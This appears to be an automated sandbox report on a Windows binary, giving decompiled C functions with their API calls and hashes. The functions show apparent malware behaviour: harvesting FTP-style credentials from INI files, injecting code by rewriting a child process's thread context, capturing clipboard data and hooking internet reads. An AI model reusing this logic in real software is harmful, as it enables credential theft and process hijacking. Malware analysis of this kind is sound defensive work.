    • Opcode Fuzzy Hash: 6d28c9fed770babdeb51da01369116c3626a732551c3723bd645e67b585133f4
    • Instruction Fuzzy Hash: F4711AB1900219ABDB10EBE5CD45BEFB7BDEB48304F54407AB505F3291DB38AA85CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00417E6B(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				char _v564;
    				short _v576;
    				short _v588;
    				short _v600;
    				short _v608;
    				WCHAR* _v612;
    				WCHAR* _v616;
    				WCHAR* _v620;
    				WCHAR* _v624;
    				WCHAR* _v628;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t51;
    				WCHAR* _t54;
    				WCHAR* _t56;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t63;
    				long _t67;
    				WCHAR* _t69;
    				long _t77;
    				long _t80;
    				WCHAR* _t82;
    				void* _t83;
    				WCHAR* _t86;
    				WCHAR* _t87;
    				short* _t92;
    				WCHAR* _t93;
    				int _t102;
    				WCHAR* _t107;
    				intOrPtr _t114;
    				signed int _t115;
    				void* _t117;
    
    				_t117 = (_t115 & 0xfffffff8) - 0x26c;
    				if(E0040C70A( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L19:
    					return 1;
    				}
    				_t120 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t107 = E00406E55(0x1fffe);
    					_v612 = _t107;
    					__eflags = _t107;
    					if(_t107 == 0) {
    						goto L19;
    					}
    					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
    					__eflags = _t51;
    					if(_t51 == 0) {
    						L18:
    						E00406E85(_t107);
    						goto L19;
    					}
    					_t9 =  &(_t51[0]); // 0x1
    					_t54 = E00407D35(_t107, _t9);
    					__eflags = _t54;
    					if(_t54 == 0) {
    						goto L18;
    					}
    					_t56 = E00406E55(0xc1c);
    					_v620 = _t56;
    					__eflags = _t56;
    					if(_t56 != 0) {
    						_t11 =  &(_t56[0xff]); // 0x1fe
    						_t92 = _t11;
    						_v624 = _t107;
    						_v616 = _t92;
    						_t57 = 0x5c;
    						_t93 =  &(_t92[0xff]);
    						__eflags = _t93;
    						E00405B00(_t57,  &_v608);
    						_t59 = 0x5d;
    						E00405B00(_t59,  &_v588);
    						_t61 = 0x5e;
    						E00405B00(_t61,  &_v576);
    						_t63 = 0x5f;
    						E00405B00(_t63,  &_v600);
    						do {
    							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
    							__eflags = _t67;
    							if(_t67 != 0) {
    								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
    								_t25 = _t102 - 1; // -1
    								__eflags = _t25 - 0xfffe;
    								if(_t25 <= 0xfffe) {
    									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
    									__eflags = _t77;
    									if(_t77 != 0) {
    										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
    										__eflags = _t80;
    										if(_t80 != 0) {
    											_t82 = E00417D5E(_v624, _t93);
    											__eflags = _t82;
    											if(_t82 > 0) {
    												_t113 =  &_v564;
    												_t83 = 0x55;
    												E00405B00(_t83,  &_v564);
    												_push(_t102);
    												_push(_v620);
    												_push(_t93);
    												_push(_v616);
    												_t37 =  &(_t93[0xff]); // 0x1fe
    												_t103 = _t37;
    												_t86 = E00407B78(_t113, 0x311, _t37, _t113);
    												_t117 = _t117 + 0x14;
    												__eflags = _t86;
    												if(_t86 > 0) {
    													_t114 = _a4;
    													_t87 = E00407279(_t86, _t114, _t103);
    													__eflags = _t87;
    													if(_t87 != 0) {
    														_t39 = _t114 + 4;
    														 *_t39 =  &(( *(_t114 + 4))[0]);
    														__eflags =  *_t39;
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							_t69 = E00407D71(_v624, 1);
    							_v628 = _t69;
    							__eflags = _t69;
    						} while (_t69 != 0);
    						E00406E85(_v620);
    						_t107 = _v616;
    					}
    					goto L18;
    				} else {
    					E00417E11(_t120,  &_v524, _a4);
    					goto L19;
    				}
    			}

    APIs
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • GetPrivateProfileStringW.KERNEL32 ref: 00417ED2
    • GetPrivateProfileStringW.KERNEL32 ref: 00417F66
    • GetPrivateProfileIntW.KERNEL32 ref: 00417F84
    • GetPrivateProfileStringW.KERNEL32 ref: 00417FAF
    • GetPrivateProfileStringW.KERNEL32 ref: 00417FCB
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: 4336fb5bd58419549db3eb1caa252f59f06bc7905f945503935a5d62f324d4ee
    • Instruction ID: a15c65415564a921c25f8c28eb10dff0467936983c03a899b6d0b8fb2c294527
    • Opcode Fuzzy Hash: 4336fb5bd58419549db3eb1caa252f59f06bc7905f945503935a5d62f324d4ee
    • Instruction Fuzzy Hash: D451D131508705ABD710EF21CC40FAB7BE8EF48744F41093EBA44A71A1DB79E949CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040CCEE(void* __ecx, signed int __edx, void** __esi, long _a4) {
    				char _v5;
    				void _v16;
    				struct _OVERLAPPED* _v24;
    				struct _OVERLAPPED* _v28;
    				signed int _v32;
    				signed int _v36;
    				void* _t29;
    				signed int _t31;
    				int _t38;
    				int _t39;
    				signed int _t41;
    				int _t42;
    				int _t45;
    				intOrPtr _t48;
    				void* _t49;
    				signed int _t53;
    				struct _OVERLAPPED* _t54;
    				void** _t56;
    
    				_t56 = __esi;
    				_t53 = __edx;
    				_t49 = __ecx;
    				_t54 = 0;
    				_v5 = 0;
    				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
    				 *__esi = _t29;
    				if(_t29 != 0xffffffff) {
    					_t31 = E0040C1B9(_t49, _t29);
    					_v36 = _t31;
    					_v32 = _t53;
    					if((_t31 & _t53) == 0xffffffff) {
    						L4:
    						CloseHandle( *_t56);
    						 *_t56 =  *_t56 | 0xffffffff;
    					} else {
    						if((_t31 | _t53) == 0) {
    							L18:
    							_t56[2] = _t56[2] | 0xffffffff;
    							_t25 =  &(_t56[3]);
    							 *_t25 = _t56[3] | 0xffffffff;
    							__eflags =  *_t25;
    							_v5 = 1;
    							E0040C169( *_t56, _t54, _t54, _t54);
    						} else {
    							_v28 = 0;
    							_v24 = 0;
    							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
    								while(1) {
    									__eflags = _a4 - _t54;
    									if(_a4 == _t54) {
    										goto L18;
    									}
    									__eflags = _a4 - 5;
    									if(_a4 != 5) {
    										L16:
    										_t38 = E0040C169( *_t56, _v28, _v24, _t54);
    										__eflags = _t38;
    										if(_t38 == 0) {
    											goto L4;
    										} else {
    											_t39 = SetEndOfFile( *_t56);
    											__eflags = _t39;
    											if(_t39 == 0) {
    												goto L4;
    											} else {
    												goto L18;
    											}
    										}
    									} else {
    										_t41 = _v16 ^ _t56[4];
    										asm("adc edi, [ebp-0x14]");
    										_t48 = _t41 + _v28 + 5;
    										asm("adc edi, ecx");
    										_v16 = _t41;
    										__eflags = 0 - _v32;
    										if(__eflags > 0) {
    											L15:
    											_t54 = 0;
    											__eflags = 0;
    											goto L16;
    										} else {
    											if(__eflags < 0) {
    												L11:
    												__eflags = _t41 - 0xa00000;
    												if(_t41 > 0xa00000) {
    													goto L15;
    												} else {
    													_t42 = E0040C169( *_t56, _t41, 0, 1);
    													__eflags = _t42;
    													if(_t42 == 0) {
    														goto L4;
    													} else {
    														_v28 = _t48;
    														_v24 = 0;
    														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
    														__eflags = _t45;
    														if(_t45 != 0) {
    															_t54 = 0;
    															__eflags = 0;
    															continue;
    														} else {
    															goto L4;
    														}
    													}
    												}
    											} else {
    												__eflags = _t48 - _v36;
    												if(_t48 > _v36) {
    													goto L15;
    												} else {
    													goto L11;
    												}
    											}
    										}
    									}
    									goto L19;
    								}
    								goto L18;
    							} else {
    								goto L4;
    							}
    						}
    					}
    				}
    				L19:
    				return _v5;
    			}

    APIs
    • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0040CD0F
      • Part of subcall function 0040C1B9: GetFileSizeEx.KERNEL32(0040CD26,0040CD26,?,?,?,0040CD26,00000000), ref: 0040C1C5
    • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0040CD50
    • CloseHandle.KERNEL32(?,00000000), ref: 0040CD5C
    • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 0040CDCB
    • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040CDF1
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Read$CloseCreateHandleSize
    • String ID:
    • API String ID: 1850650832-0
    • Opcode ID: 13c9f67765ce5d68ff82a39f65561e31c03f35b861f1c4acd1a9debcf7f1054c
    • Instruction ID: 6d0b48b85d44bad2fdff54eaad848fc58d0cdb72ae7ebe4eb91a5110f2a4b2d6
    • Opcode Fuzzy Hash: 13c9f67765ce5d68ff82a39f65561e31c03f35b861f1c4acd1a9debcf7f1054c
    • Instruction Fuzzy Hash: 05418E30900245EADB209FA5CC85BAFBFB5EF88710F14433AE695B62E0D7394941DB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0040D423(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
    				int _v8;
    				void* _t37;
    				long _t38;
    				struct HBITMAP__* _t46;
    				void* _t47;
    				signed int _t56;
    				signed int _t57;
    				BITMAPINFO** _t62;
    				BITMAPINFO* _t64;
    
    				_t57 = __edx;
    				_v8 = 0;
    				_t64 = E00406E55(0x428);
    				if(_t64 == 0) {
    					L14:
    					if(_a24 != 0) {
    						DeleteObject(_a24);
    					}
    					L16:
    					return _v8;
    				}
    				_t64->bmiHeader = 0x28;
    				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
    					L13:
    					E00406E85(_t64);
    					goto L14;
    				} else {
    					DeleteObject(_a24);
    					asm("cdq");
    					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
    					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
    					_a24 = 0;
    					_t64->bmiHeader.biHeight = _t56;
    					if(_t37 == 0) {
    						L7:
    						_t64->bmiHeader.biClrUsed = 0;
    						_push(8);
    						_t64->bmiHeader.biClrImportant = 0;
    						L8:
    						_pop(_t38);
    						_t64->bmiHeader.biBitCount = _t38;
    						L9:
    						_t62 = _a8;
    						asm("cdq");
    						_t58 = _t57 & 0x00000007;
    						asm("cdq");
    						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
    						_t64->bmiHeader.biCompression = 0;
    						if(_t62 != 0) {
    							 *_t62 = _t64;
    						}
    						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
    						_v8 = _t46;
    						if(_t46 == 0 || _t62 == 0) {
    							goto L13;
    						} else {
    							goto L16;
    						}
    					}
    					_t47 = _t37 - 3;
    					if(_t47 == 0) {
    						goto L7;
    					}
    					if(_t47 != 0x14) {
    						goto L9;
    					}
    					_push(0x20);
    					goto L8;
    				}
    			}

    APIs
    • GetDIBits.GDI32(00000000,0040D711,00000000,00000001,00000000,00000000,00000000), ref: 0040D45B
    • GetDIBits.GDI32(00000000,0040D711,00000000,00000001,00000000,00000000,00000000), ref: 0040D471
    • DeleteObject.GDI32(0040D711), ref: 0040D47E
    • CreateDIBSection.GDI32(00000000,00000000,00000000,004231D8,?,?), ref: 0040D4EE
    • DeleteObject.GDI32(0040D711), ref: 0040D50D
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: BitsDeleteObject$CreateSection
    • String ID:
    • API String ID: 1423349713-0
    • Opcode ID: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
    • Instruction ID: 5dbe20091d5876fd5d7931545975f98160f3023c1dd6b4644c1f2d6d08638db6
    • Opcode Fuzzy Hash: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
    • Instruction Fuzzy Hash: 2931D67650020ABFDF209F65CD84A6B7AE9EF48344B04843FF945E62A0C739ED54DB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E0041C508(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
    				intOrPtr _v28;
    				signed int _v44;
    				char _v52;
    				intOrPtr _v56;
    				char _v61;
    				intOrPtr _v64;
    				signed int _v72;
    				intOrPtr _v76;
    				char _v77;
    				intOrPtr _v84;
    				intOrPtr _v85;
    				char _v89;
    				void* __esi;
    				char _t31;
    				intOrPtr _t32;
    				char* _t37;
    				intOrPtr _t44;
    				intOrPtr* _t58;
    				intOrPtr _t62;
    				intOrPtr* _t63;
    				intOrPtr _t65;
    
    				_t63 = __edi;
    				ResetEvent(_a8);
    				_t31 = E00406E55(0x1000);
    				_t65 = 0;
    				_v52 = _t31;
    				if(_t31 != 0) {
    					_t58 = __imp__InternetSetStatusCallbackW;
    					_t32 =  *_t58(_a4, E0041C4BF);
    					_t62 = 0x28;
    					_v56 = _t32;
    					 *_a12 = 0;
    					 *__edi = 0;
    					_v61 = 1;
    					E00406F38( &_v52,  &_v52, 0, _t62);
    					_v64 = _t62;
    					_v44 = _v72;
    					while(1) {
    						L3:
    						_t37 =  &_v52;
    						_v28 = 0x1000;
    						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
    						if(_t37 == 0) {
    							break;
    						}
    						if(_v44 != _t65) {
    							_t67 = _a12;
    							if(E00406E10( *_t63 + _v44, _a12) == 0) {
    								L9:
    								_v77 = 0;
    							} else {
    								E00406EC1( *_t67 +  *_t63, _v76, _v44);
    								 *_t63 =  *_t63 + _v56;
    								_t65 = 0;
    								continue;
    							}
    						}
    						L10:
    						asm("sbb eax, eax");
    						 *_t58(_a4,  ~(_v72 + 1) & _v72);
    						E00406E85(_v84);
    						if(_v89 == 0) {
    							E00406E85( *_a12);
    						}
    						_t44 = _v85;
    						goto L13;
    					}
    					if(GetLastError() != 0x3e5) {
    						goto L9;
    					} else {
    						E0040A5F2( &_a8);
    						goto L3;
    					}
    					goto L10;
    				} else {
    					E00406E85(0);
    					_t44 = 0;
    				}
    				L13:
    				return _t44;
    			}

    APIs
    • ResetEvent.KERNEL32(?), ref: 0041C516
    • InternetSetStatusCallbackW.WININET(?,0041C4BF), ref: 0041C54B
    • InternetReadFileExA.WININET ref: 0041C58B
    • GetLastError.KERNEL32 ref: 0041C595
    • InternetSetStatusCallbackW.WININET(?,?), ref: 0041C5F9
      • Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
    • String ID:
    • API String ID: 4044253124-0
    • Opcode ID: b0236476650b5e352073ad7cf27ddb42baba888b1a08b4e03a7c5d3e7b92595a
    • Instruction ID: ccae93639ff710772ea2cc8870d90515db3e89606470bf99454a03de376c0477
    • Opcode Fuzzy Hash: b0236476650b5e352073ad7cf27ddb42baba888b1a08b4e03a7c5d3e7b92595a
    • Instruction Fuzzy Hash: F1317E71148351AFCB01DF65CC80A9EBBE9FF49744F00492AF885E7261D738D9A4CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E00413DA3(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
    				struct _CONTEXT _v720;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t32;
    				void* _t36;
    				void* _t37;
    				void** _t45;
    				void* _t46;
    				void* _t47;
    				void** _t50;
    				void* _t52;
    				void* _t53;
    				signed int _t55;
    
    				_t47 = __edx;
    				_t45 = _a4;
    				_t32 =  *0x42398c(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
    				_a40 = _t32;
    				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00412FEE() != 0 && GetProcessId( *_t45) != 0) {
    					_t36 = E00412E11(_t46, _t47, _t35);
    					_a44 = _t36;
    					_t63 = _t36;
    					if(_t36 != 0) {
    						_push(_t52);
    						_t37 = E00412F03(_t46,  *_t45, _t52, _t63, _t36, 0);
    						_t50 = _a8;
    						_t53 = _t37;
    						_a32 = _t53;
    						_t55 = _t53 -  *0x42397c + E00413670;
    						_v720.ContextFlags = 0x10003;
    						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x423994) {
    							L12:
    							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
    						} else {
    							if(( *0x423968 & 0x00000010) != 0) {
    								_t55 = _t55 ^ _v720.Eax;
    							}
    							_v720.Eax = _t55;
    							_v720.ContextFlags = 0x10002;
    							if(SetThreadContext( *_t50,  &_v720) == 0) {
    								goto L12;
    							}
    						}
    						CloseHandle(_a44);
    					}
    				}
    				return _a40;
    			}

    APIs
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • GetProcessId.KERNEL32(?), ref: 00413E0B
      • Part of subcall function 00412E11: CreateMutexW.KERNEL32(004239A0,00000001,?,00423BE0,74B5F560,?,00000002,?,74B5F560), ref: 00412E62
      • Part of subcall function 00412E11: GetLastError.KERNEL32 ref: 00412E6E
      • Part of subcall function 00412E11: CloseHandle.KERNEL32(00000000), ref: 00412E7C
    • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00413E5D
    • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00413E9D
    • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00413EB3
    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00413EBC
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
    • String ID:
    • API String ID: 3998962940-0
    • Opcode ID: c688fc29bee2bd29f1679afc3207a1f7ff2db475b2f8fab26af26bc7ac9a08bf
    • Instruction ID: 85020feb429ce340af31386fb28ad7abc7f316497f4c529dbb66f18782a47491
    • Opcode Fuzzy Hash: c688fc29bee2bd29f1679afc3207a1f7ff2db475b2f8fab26af26bc7ac9a08bf
    • Instruction Fuzzy Hash: 0A311A31501219ABDF129F65CD48BDE7BB9AF0870AF004066FE08A62A0D379DDA5DF58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004059F6(struct HWND__* __ecx, intOrPtr* __edx) {
    				struct tagRECT _v24;
    				char _v28;
    				struct HWND__* _v32;
    				intOrPtr _v36;
    				struct HWND__* _v40;
    				void* __edi;
    				intOrPtr _t29;
    				signed int _t30;
    				RECT* _t52;
    				signed int _t54;
    				intOrPtr* _t61;
    
    				_t55 = __edx;
    				_t61 = __edx;
    				 *( *(__edx + 0x14)) = 0x3c;
    				_v32 = __ecx;
    				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
    					L12:
    					return 1;
    				}
    				_t29 =  *((intOrPtr*)(_t61 + 0x14));
    				_t54 =  *(_t29 + 0x24);
    				if((_t54 & 0x40000000) == 0) {
    					_t52 =  *_t61 + 0x24;
    				} else {
    					_t52 = _t61 + 4;
    				}
    				if((_t54 & 0x10000000) == 0) {
    					_t30 = 0;
    					goto L9;
    				} else {
    					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
    						L10:
    						E00405885( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
    						_v36 =  *_t61;
    						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
    						if(GetTopWindow(_v40) != 0) {
    							E0040B58B( &_v28, _t35);
    						}
    						goto L12;
    					}
    					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
    						goto L12;
    					}
    					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
    					L9:
    					if(_t30 == 0) {
    						goto L12;
    					}
    					goto L10;
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Rect$IntersectWindow$EmptyInfo
    • String ID:
    • API String ID: 1664082778-0
    • Opcode ID: 9f3af80595b1cd797ac7001e800c99d3af98d12063de9dfea2383cff05319795
    • Instruction ID: 6e8f32979e9f3d851a5a440f151b4d1899db2f6c9b6478ab25287e6cd186f337
    • Opcode Fuzzy Hash: 9f3af80595b1cd797ac7001e800c99d3af98d12063de9dfea2383cff05319795
    • Instruction Fuzzy Hash: EF212CB1200701ABD720DF68D984E57B7ECEF44714B040A2AFC86E3691DB39E8058E75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004156E6(void* __ecx, void* __eflags) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v104;
    				char _v204;
    				char _v724;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t18;
    				void* _t24;
    				void* _t26;
    				long _t28;
    				long _t35;
    				void* _t40;
    				WCHAR* _t43;
    				void* _t50;
    
    				_t50 = __eflags;
    				_t40 = __ecx;
    				SetThreadPriority(GetCurrentThread(), 0);
    				_t18 = E00412EC8(_t40, _t50, 0x19367402, 1);
    				_v12 = _t18;
    				if(_t18 != 0) {
    					E00412E8D(0xff220829,  &_v204, 0);
    					_t43 =  &_v724;
    					E004131E9(_t40, _t43, 1);
    					PathQuoteSpacesW(_t43);
    					_t41 = _t43;
    					_v8 = E004079D4(_t43);
    					_t24 = E00412FEE();
    					__eflags = _t24;
    					if(_t24 == 0) {
    						L7:
    						E0040A658(_v12);
    						__eflags = 0;
    						return 0;
    					}
    					_t26 = 3;
    					E00405B00(_t26,  &_v104);
    					_t28 = WaitForSingleObject( *0x423e2c, 0xc8);
    					__eflags = _t28 - 0x102;
    					if(_t28 != 0x102) {
    						L6:
    						goto L7;
    					}
    					_v8 = _v8 + _v8 + 2;
    					do {
    						E0040B104(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
    						_t35 = WaitForSingleObject( *0x423e2c, 0xc8);
    						__eflags = _t35 - 0x102;
    					} while (_t35 == 0x102);
    					goto L6;
    				}
    				return _t18 + 1;
    			}

    APIs
    • GetCurrentThread.KERNEL32 ref: 004156F1
    • SetThreadPriority.KERNEL32(00000000), ref: 004156F8
      • Part of subcall function 00412EC8: CreateMutexW.KERNEL32(004239A0,00000000,?,?,?,?,?), ref: 00412EE9
    • PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0041573B
    • WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 00415773
    • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 004157A9
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
    • String ID:
    • API String ID: 123286213-0
    • Opcode ID: 8ea071e3b05098877b0b8fdd310211e2f176845ee0c4e035fd055c89acaaa6a5
    • Instruction ID: 95cc7c22b8dd04b32f302b43183d0e28ce9e9876c24d9cb63057eb53a46e8498
    • Opcode Fuzzy Hash: 8ea071e3b05098877b0b8fdd310211e2f176845ee0c4e035fd055c89acaaa6a5
    • Instruction Fuzzy Hash: 5B219F71A00208EADF11EBA0DD86FDE7779EB44304F500466F500F71A1DA799E858B58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E00405E4D(void* _a4) {
    				signed int _t11;
    				void* _t21;
    				void* _t23;
    				void* _t24;
    				int _t25;
    
    				_t25 = _a4;
    				_t23 = GetClipboardData(_t25);
    				_a4 = _t23;
    				if(E00412FEE() == 0) {
    					return _t23;
    				}
    				if(_t23 == 0 || _t25 != 1 && _t25 != 0xd && _t25 != 7) {
    					L20:
    					return _a4;
    				} else {
    					_t21 = GlobalLock(_t23);
    					if(_t21 == 0) {
    						L19:
    						goto L20;
    					}
    					_t11 = _t25 - 1;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(0);
    						L12:
    						_t24 = E004070C5(_t11 | 0xffffffff);
    						L15:
    						if(_t24 != 0) {
    							EnterCriticalSection(0x4223b8);
    							E00405B4A(0x40424c);
    							E00405B4A(_t24);
    							LeaveCriticalSection(0x4223b8);
    							if(_t24 != _t21) {
    								E00406E85(_t24);
    							}
    						}
    						GlobalUnlock(_a4);
    						goto L19;
    					}
    					_t11 = _t11 - 6;
    					if(_t11 == 0) {
    						_push(_t21);
    						_push(1);
    						goto L12;
    					}
    					if(_t11 != 6) {
    						_t24 = _a4;
    					} else {
    						_t24 = _t21;
    					}
    					goto L15;
    				}
    			}

    APIs
    • GetClipboardData.USER32 ref: 00405E56
      • Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6
    • GlobalLock.KERNEL32 ref: 00405E8A
    • EnterCriticalSection.KERNEL32(004223B8,00000000,00000000), ref: 00405ECA
    • LeaveCriticalSection.KERNEL32(004223B8,00000000,0040424C), ref: 00405EE1
    • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00405EF4
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
    • String ID:
    • API String ID: 1109978993-0
    • Opcode ID: 61ff5c67e846938906b893246127978924e471db8062ac4fa538f4afbb832f88
    • Instruction ID: 403609ddd01379b74bee4a7d90fe7afd9ce71d9f342988cc7d2d52cf6c124eb2
    • Opcode Fuzzy Hash: 61ff5c67e846938906b893246127978924e471db8062ac4fa538f4afbb832f88
    • Instruction Fuzzy Hash: 7C11E232100A05A7C7112B68CD849BF3629DB81391B15013BF989F72E0DB3C9E429EDD
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000002,00000000), ref: 0040A3BC
    • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0040A3E6
    • WSAGetLastError.WS2_32 ref: 0040A3ED
